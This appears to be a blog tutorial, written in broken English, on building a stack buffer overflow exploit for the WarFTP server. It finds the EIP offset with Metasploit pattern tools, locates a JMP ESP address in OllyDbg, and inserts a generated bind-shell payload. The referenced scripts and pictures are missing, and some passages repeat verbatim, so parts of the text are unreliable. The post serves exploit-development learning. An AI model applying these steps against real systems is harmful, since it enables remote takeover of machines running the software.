Pattren create is one of the tools in the metasploit that can be used in conducting vulnerability development
function is to create a data dummies that have been structured.
in part 1
data used in the fuzzer just a row of letters A total of 1000 bytes,
Now by using pattren create. Data transmitted by the fuzzer is a more structured data as much as 1000 bytes.
The main purpose we use pattrencreat is to find out the actual location of a string the data packets to the application submitted by the fuzzer.
and certainly with a more structured pattern of data.
- to start the open application console and go into the folder / pentest / exploits / framework / tools /
and then to generate the data as much as 1000 bytes run the command like this.
./pattren_create.rb 1000 > string_pattern.txt
This is a string data pattern.txt
of 1000 bytes
of 1000 bytes
- to view the file using any text editor application. I use kate
- after string_pattern.txt successfully created.
change the script like the following :
- after changing the variable values in the buffer, a collection of string pattren.
different from before,
current value of the register on application memory WRFTP.
filled with a string pattern that had been incorporated into the application fuzzer
pattern offset is a tool commonly used in mendeveloping vulnerability.
functions of this application is to calculate the amount of bytes from the collection pattern.
- The first thing we do is edit fuzzer script as below:
- then run WarFTP in OllyDbg and run applications that have been in costomize fuzer:
can see the value in the EIP has been transformed into DEEDBEEF
if successful in overrite stack. it will be possible to get the payload in the stack
- once again we do costomize on xfuzz script. as below:
repeat again. run applications WarFTP through Ollydbg.
of the picture.
be seen in the register EIP contains the stack DEADBEEF and waste in the form of characters
\xCC
Phase Exploitation :
the first we do JMP ESP in OllyDbg, its usefulness is to find out the addres in memory.
for which we know however ESP can acces to buffer (stack)
this is what we use to exploit the letter.
be seen in the register EIP contains the stack DEADBEEF and waste in the form of characters
\xCC
Phase Exploitation :
the first we do JMP ESP in OllyDbg, its usefulness is to find out the addres in memory.
for which we know however ESP can acces to buffer (stack)
this is what we use to exploit the letter.
- running aplication OllyDbg and select menu view -> executable modules
select Shel 32
next select serch for -> command.
write JMP ESP and click find.
and we have found the shell file memory address 23.
and enter the address to the application fuzzer we have made
and test fuzzer.
and see if it works.
if successful. application war ftp will direct the next command in the buffer (stack) in the memory.
- This stage is the final stage.,
where the time for us to exploit the application WarFTP
follow the steps "are:
go to konsole and write cd /pentest/exploits/framework2/
open your web browser
then type http://127.0.0.1:5555
then select the windows and select the shell blind
change in accordance with the drawings in addition to
and klik Generate
copy line of code to your application fuzzer
- then open your WarFTP applications., and connect with telnet
seen that the payload successfully overwrite the existing buffer on the system
and survived., overall you have mastered the windows system
Tidak ada komentar:
Posting Komentar